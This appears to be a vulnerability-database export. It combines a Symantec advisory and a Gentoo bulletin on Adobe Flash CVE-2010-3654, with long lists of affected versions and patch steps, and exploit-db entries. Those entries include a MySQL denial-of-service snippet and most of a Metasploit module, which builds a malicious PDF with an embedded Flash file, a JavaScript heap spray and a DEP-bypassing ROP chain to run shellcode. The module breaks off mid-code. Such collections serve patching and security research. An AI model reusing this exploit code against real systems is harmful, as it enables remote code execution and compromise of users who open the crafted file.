Google Chrome 5.0.317.0 \n * Google Chrome 5.0.317.1 \n * Google Chrome 5.0.317.2 \n * Google Chrome 5.0.318.0 \n * Google Chrome 5.0.319.0 \n * Google Chrome 5.0.320.0 \n * Google Chrome 5.0.321.0 \n * Google Chrome 5.0.322.0 \n * Google Chrome 5.0.322.1 \n * Google Chrome 5.0.322.2 \n * Google Chrome 5.0.323.0 \n * Google Chrome 5.0.324.0 \n * Google Chrome 5.0.325.0 \n * Google Chrome 5.0.326.0 \n * Google Chrome 5.0.327.0 \n * Google Chrome 5.0.328.0 \n * Google Chrome 5.0.329.0 \n * Google Chrome 5.0.330.0 \n * Google Chrome 5.0.332.0 \n * Google Chrome 5.0.333.0 \n * Google Chrome 5.0.334.0 \n * Google Chrome 5.0.335.0 \n * Google Chrome 5.0.335.1 \n * Google Chrome 5.0.335.2 \n * Google Chrome 5.0.335.3 \n * Google Chrome 5.0.335.4 \n * Google Chrome 5.0.336.0 \n * Google Chrome 5.0.337.0 \n * Google Chrome 5.0.338.0 \n * Google Chrome 5.0.339.0 \n * Google Chrome 5.0.340.0 \n * Google Chrome 5.0.341.0 \n * Google Chrome 5.0.342.0 \n * Google Chrome 5.0.342.1 \n * Google Chrome 5.0.342.2 \n * Google Chrome 5.0.342.3 \n * Google Chrome 5.0.342.4 \n * Google Chrome 5.0.342.5 \n * Google Chrome 5.0.342.6 \n * Google Chrome 5.0.342.7 \n * Google Chrome 5.0.342.8 \n * Google Chrome 5.0.342.9 \n * Google Chrome 5.0.343.0 \n * Google Chrome 5.0.344.0 \n * Google Chrome 5.0.345.0 \n * Google Chrome 5.0.346.0 \n * Google Chrome 5.0.347.0 \n * Google Chrome 5.0.348.0 \n * Google Chrome 5.0.349.0 \n * Google Chrome 5.0.350.0 \n * Google Chrome 5.0.350.1 \n * Google Chrome 5.0.351.0 \n * Google Chrome 5.0.353.0 \n * Google Chrome 5.0.354.0 \n * Google Chrome 5.0.354.1 \n * Google Chrome 5.0.355.0 \n * Google Chrome 5.0.356.0 \n * Google Chrome 5.0.356.1 \n * Google Chrome 5.0.356.2 \n * Google Chrome 5.0.357.0 \n * Google Chrome 5.0.358.0 \n * Google Chrome 5.0.359.0 \n * Google Chrome 5.0.360.0 \n * Google Chrome 5.0.360.3 \n * Google Chrome 5.0.360.4 \n * Google Chrome 5.0.360.5 \n * Google Chrome 5.0.361.0 \n * Google Chrome 5.0.362.0 \n * Google Chrome 5.0.363.0 \n * Google Chrome 5.0.364.0 \n * Google Chrome 5.0.365.0 \n * Google Chrome 5.0.366.0 \n * Google Chrome 5.0.366.1 \n * Google Chrome 5.0.366.2 \n * Google Chrome 5.0.366.3 \n * Google Chrome 5.0.366.4 \n * Google Chrome 5.0.367.0 \n * Google Chrome 5.0.368.0 \n * Google Chrome 5.0.369.0 \n * Google Chrome 5.0.369.1 \n * Google Chrome 5.0.369.2 \n * Google Chrome 5.0.370.0 \n * Google Chrome 5.0.371.0 \n * Google Chrome 5.0.372.0 \n * Google Chrome 5.0.373.0 \n * Google Chrome 5.0.374.0 \n * Google Chrome 5.0.375.0 \n * Google Chrome 5.0.375.1 \n * Google Chrome 5.0.375.10 \n * Google Chrome 5.0.375.11 \n * Google Chrome 5.0.375.12 \n * Google Chrome 5.0.375.125 \n * Google Chrome 5.0.375.125 \n * Google Chrome 5.0.375.126 \n * Google Chrome 5.0.375.127 \n * Google Chrome 5.0.375.13 \n * Google Chrome 5.0.375.14 \n * Google Chrome 5.0.375.15 \n * Google Chrome 5.0.375.16 \n * Google Chrome 5.0.375.17 \n * Google Chrome 5.0.375.18 \n * Google Chrome 5.0.375.19 \n * Google Chrome 5.0.375.2 \n * Google Chrome 5.0.375.20 \n * Google Chrome 5.0.375.21 \n * Google Chrome 5.0.375.22 \n * Google Chrome 5.0.375.23 \n * Google Chrome 5.0.375.25 \n * Google Chrome 5.0.375.26 \n * Google Chrome 5.0.375.27 \n * Google Chrome 5.0.375.28 \n * Google Chrome 5.0.375.29 \n * Google Chrome 5.0.375.3 \n * Google Chrome 5.0.375.30 \n * Google Chrome 5.0.375.31 \n * Google Chrome 5.0.375.32 \n * Google Chrome 5.0.375.33 \n * Google Chrome 5.0.375.34 \n * Google Chrome 5.0.375.35 \n * Google Chrome 5.0.375.36 \n * Google Chrome 5.0.375.37 \n * Google Chrome 5.0.375.38 \n * Google Chrome 5.0.375.39 \n * Google Chrome 5.0.375.4 \n * Google Chrome 5.0.375.40 \n * Google Chrome 5.0.375.41 \n * Google Chrome 5.0.375.42 \n * Google Chrome 5.0.375.43 \n * Google Chrome 5.0.375.44 \n * Google Chrome 5.0.375.45 \n * Google Chrome 5.0.375.46 \n * Google Chrome 5.0.375.47 \n * Google Chrome 5.0.375.48 \n * Google Chrome 5.0.375.49 \n * Google Chrome 5.0.375.5 \n * Google Chrome 5.0.375.50 \n * Google Chrome 5.0.375.51 \n * Google Chrome 5.0.375.52 \n * Google Chrome 5.0.375.53 \n * Google Chrome 5.0.375.54 \n * Google Chrome 5.0.375.55 \n * Google Chrome 5.0.375.56 \n * Google Chrome 5.0.375.57 \n * Google Chrome 5.0.375.58 \n * Google Chrome 5.0.375.59 \n * Google Chrome 5.0.375.6 \n * Google Chrome 5.0.375.60 \n * Google Chrome 5.0.375.61 \n * Google Chrome 5.0.375.62 \n * Google Chrome 5.0.375.63 \n * Google Chrome 5.0.375.64 \n * Google Chrome 5.0.375.65 \n * Google Chrome 5.0.375.66 \n * Google Chrome 5.0.375.67 \n * Google Chrome 5.0.375.68 \n * Google Chrome 5.0.375.69 \n * Google Chrome 5.0.375.7 \n * Google Chrome 5.0.375.70 \n * Google Chrome 5.0.375.71 \n * Google Chrome 5.0.375.72 \n * Google Chrome 5.0.375.73 \n * Google Chrome 5.0.375.74 \n * Google Chrome 5.0.375.75 \n * Google Chrome 5.0.375.76 \n * Google Chrome 5.0.375.77 \n * Google Chrome 5.0.375.78 \n * Google Chrome 5.0.375.79 \n * Google Chrome 5.0.375.8 \n * Google Chrome 5.0.375.80 \n * Google Chrome 5.0.375.81 \n * Google Chrome 5.0.375.82 \n * Google Chrome 5.0.375.83 \n * Google Chrome 5.0.375.84 \n * Google Chrome 5.0.375.85 \n * Google Chrome 5.0.375.86 \n * Google Chrome 5.0.375.86 \n * Google Chrome 5.0.375.87 \n * Google Chrome 5.0.375.88 \n * Google Chrome 5.0.375.89 \n * Google Chrome 5.0.375.9 \n * Google Chrome 5.0.375.90 \n * Google Chrome 5.0.375.91 \n * Google Chrome 5.0.375.92 \n * Google Chrome 5.0.375.93 \n * Google Chrome 5.0.375.94 \n * Google Chrome 5.0.375.95 \n * Google Chrome 5.0.375.96 \n * Google Chrome 5.0.375.97 \n * Google Chrome 5.0.375.98 \n * Google Chrome 5.0.375.99 \n * Google Chrome 5.0.375.99 \n * Google Chrome 5.0.376.0 \n * Google Chrome 5.0.378.0 \n * Google Chrome 5.0.379.0 \n * Google Chrome 5.0.380.0 \n * Google Chrome 5.0.381.0 \n * Google Chrome 5.0.382.0 \n * Google Chrome 5.0.382.3 \n * Google Chrome 5.0.383.0 \n * Google Chrome 5.0.384.0 \n * Google Chrome 5.0.385.0 \n * Google Chrome 5.0.386.0 \n * Google Chrome 5.0.387.0 \n * Google Chrome 5.0.390.0 \n * Google Chrome 5.0.391.0 \n * Google Chrome 5.0.392.0 \n * Google Chrome 5.0.393.0 \n * Google Chrome 5.0.394.0 \n * Google Chrome 5.0.395.0 \n * Google Chrome 5.0.396.0 \n * Google Chrome 6.0.397.0 \n * Google Chrome 6.0.398.0 \n * Google Chrome 6.0.399.0 \n * Google Chrome 6.0.400.0 \n * Google Chrome 6.0.401.0 \n * Google Chrome 6.0.401.1 \n * Google Chrome 6.0.403.0 \n * Google Chrome 6.0.404.0 \n * Google Chrome 6.0.404.1 \n * Google Chrome 6.0.404.2 \n * Google Chrome 6.0.405.0 \n * Google Chrome 6.0.406.0 \n * Google Chrome 6.0.407.0 \n * Google Chrome 6.0.408.0 \n * Google Chrome 6.0.408.1 \n * Google Chrome 6.0.408.10 \n * Google Chrome 6.0.408.2 \n * Google Chrome 6.0.408.3 \n * Google Chrome 6.0.408.4 \n * Google Chrome 6.0.408.5 \n * Google Chrome 6.0.408.6 \n * Google Chrome 6.0.408.7 \n * Google Chrome 6.0.408.8 \n * Google Chrome 6.0.408.9 \n * Google Chrome 6.0.409.0 \n * Google Chrome 6.0.410.0 \n * Google Chrome 6.0.411.0 \n * Google Chrome 6.0.412.0 \n * Google Chrome 6.0.413.0 \n * Google Chrome 6.0.414.0 \n * Google Chrome 6.0.415.0 \n * Google Chrome 6.0.415.1 \n * Google Chrome 6.0.416.0 \n * Google Chrome 6.0.416.1 \n * Google Chrome 6.0.417.0 \n * Google Chrome 6.0.418.0 \n * Google Chrome 6.0.418.1 \n * Google Chrome 6.0.418.2 \n * Google Chrome 6.0.418.3 \n * Google Chrome 6.0.418.4 \n * Google Chrome 6.0.418.5 \n * Google Chrome 6.0.418.6 \n * Google Chrome 6.0.418.7 \n * Google Chrome 6.0.418.8 \n * Google Chrome 6.0.418.9 \n * Google Chrome 6.0.419.0 \n * Google Chrome 6.0.421.0 \n * Google Chrome 6.0.422.0 \n * Google Chrome 6.0.423.0 \n * Google Chrome 6.0.424.0 \n * Google Chrome 6.0.425.0 \n * Google Chrome 6.0.426.0 \n * Google Chrome 6.0.427.0 \n * Google Chrome 6.0.428.0 \n * Google Chrome 6.0.430.0 \n * Google Chrome 6.0.431.0 \n * Google Chrome 6.0.432.0 \n * Google Chrome 6.0.433.0 \n * Google Chrome 6.0.434.0 \n * Google Chrome 6.0.435.0 \n * Google Chrome 6.0.436.0 \n * Google Chrome 6.0.437.0 \n * Google Chrome 6.0.437.1 \n * Google Chrome 6.0.437.2 \n * Google Chrome 6.0.437.3 \n * Google Chrome 6.0.438.0 \n * Google Chrome 6.0.440.0 \n * Google Chrome 6.0.441.0 \n * Google Chrome 6.0.443.0 \n * Google Chrome 6.0.444.0 \n * Google Chrome 6.0.445.0 \n * Google Chrome 6.0.445.1 \n * Google Chrome 6.0.446.0 \n * Google Chrome 6.0.447.0 \n * Google Chrome 6.0.447.1 \n * Google Chrome 6.0.447.2 \n * Google Chrome 6.0.449.0 \n * Google Chrome 6.0.450.0 \n * Google Chrome 6.0.450.1 \n * Google Chrome 6.0.450.2 \n * Google Chrome 6.0.450.3 \n * Google Chrome 6.0.450.4 \n * Google Chrome 6.0.451.0 \n * Google Chrome 6.0.452.0 \n * Google Chrome 6.0.452.1 \n * Google Chrome 6.0.453.0 \n * Google Chrome 6.0.453.1 \n * Google Chrome 6.0.454.0 \n * Google Chrome 6.0.455.0 \n * Google Chrome 6.0.456.0 \n * Google Chrome 6.0.457.0 \n * Google Chrome 6.0.458.0 \n * Google Chrome 6.0.458.1 \n * Google Chrome 6.0.458.2 \n * Google Chrome 6.0.459.0 \n * Google Chrome 6.0.460.0 \n * Google Chrome 6.0.461.0 \n * Google Chrome 6.0.462.0 \n * Google Chrome 6.0.464.1 \n * Google Chrome 6.0.465.1 \n * Google Chrome 6.0.465.2 \n * Google Chrome 6.0.466.0 \n * Google Chrome 6.0.466.1 \n * Google Chrome 6.0.466.2 \n * Google Chrome 6.0.466.3 \n * Google Chrome 6.0.466.4 \n * Google Chrome 6.0.466.5 \n * Google Chrome 6.0.466.6 \n * Google Chrome 6.0.467.0 \n * Google Chrome 6.0.469.0 \n * Google Chrome 6.0.470.0 \n * Google Chrome 6.0.471.0 \n * Google Chrome 6.0.472.0 \n * Google Chrome 6.0.472.1 \n * Google Chrome 6.0.472.10 \n * Google Chrome 6.0.472.11 \n * Google Chrome 6.0.472.12 \n * Google Chrome 6.0.472.13 \n * Google Chrome 6.0.472.14 \n * Google Chrome 6.0.472.15 \n * Google Chrome 6.0.472.16 \n * Google Chrome 6.0.472.17 \n * Google Chrome 6.0.472.18 \n * Google Chrome 6.0.472.19 \n * Google Chrome 6.0.472.2 \n * Google Chrome 6.0.472.20 \n * Google Chrome 6.0.472.21 \n * Google Chrome 6.0.472.22 \n * Google Chrome 6.0.472.23 \n * Google Chrome 6.0.472.24 \n * Google Chrome 6.0.472.25 \n * Google Chrome 6.0.472.26 \n * Google Chrome 6.0.472.27 \n * Google Chrome 6.0.472.28 \n * Google Chrome 6.0.472.29 \n * Google Chrome 6.0.472.3 \n * Google Chrome 6.0.472.30 \n * Google Chrome 6.0.472.31 \n * Google Chrome 6.0.472.32 \n * Google Chrome 6.0.472.33 \n * Google Chrome 6.0.472.34 \n * Google Chrome 6.0.472.35 \n * Google Chrome 6.0.472.36 \n * Google Chrome 6.0.472.37 \n * Google Chrome 6.0.472.38 \n * Google Chrome 6.0.472.39 \n * Google Chrome 6.0.472.4 \n * Google Chrome 6.0.472.40 \n * Google Chrome 6.0.472.41 \n * Google Chrome 6.0.472.42 \n * Google Chrome 7.0.517.41 \n * Macromedia Flash 5.0.0 R50 \n * Macromedia Flash 5.0.0 \n * Macromedia Flash 6.0.0 \n * Macromedia Flash 6.0.29 .0 \n * Macromedia Flash 6.0.40 .0 \n * Macromedia Flash 6.0.47 .0 \n * Macromedia Flash 6.0.65 .0 \n * Macromedia Flash 6.0.79 .0 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 10 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-10-28T00:00:00", "published": "2010-10-28T00:00:00", "id": "SMNTC-44504", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44504", "type": "symantec", "title": "Adobe Acrobat, Reader, and Flash CVE-2010-3654 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Flash Player. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.1.102.64\"", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "GLSA-201101-09", "href": "https://security.gentoo.org/glsa/201101-09", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T23:25:12", "description": "Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability. CVE-2010-3676 . Dos exploit for linux platform", "published": "2010-07-09T00:00:00", "type": "exploitdb", "title": "Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3676"], "modified": "2010-07-09T00:00:00", "id": "EDB-ID:34522", "href": "https://www.exploit-db.com/exploits/34522/", "sourceData": "source: http://www.securityfocus.com/bid/42643/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nVersions prior to MySQL 5.1.49 are vulnerable.\r\n\r\nNOTE: This issue was previously disclosed in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record. \r\n\r\nthd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34522/"}, {"lastseen": "2016-02-02T06:13:34", "description": "Adobe Flash Player \"Button\" Remote Code Execution. CVE-2010-3654. Local exploit for windows platform", "published": "2010-11-01T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-01T00:00:00", "id": "EDB-ID:16667", "href": "https://www.exploit-db.com/exploits/16667/", "sourceData": "##\r\n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\r\n\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\r\n\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'Haifei Li', # PoC\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10857 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-3654'],\r\n\t\t\t\t\t['OSVDB', '68932'],\r\n\t\t\t\t\t['BID', '44504'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],\r\n\t\t\t\t\t['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 28 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-3654.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xc0c0c0c + 0x10,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = 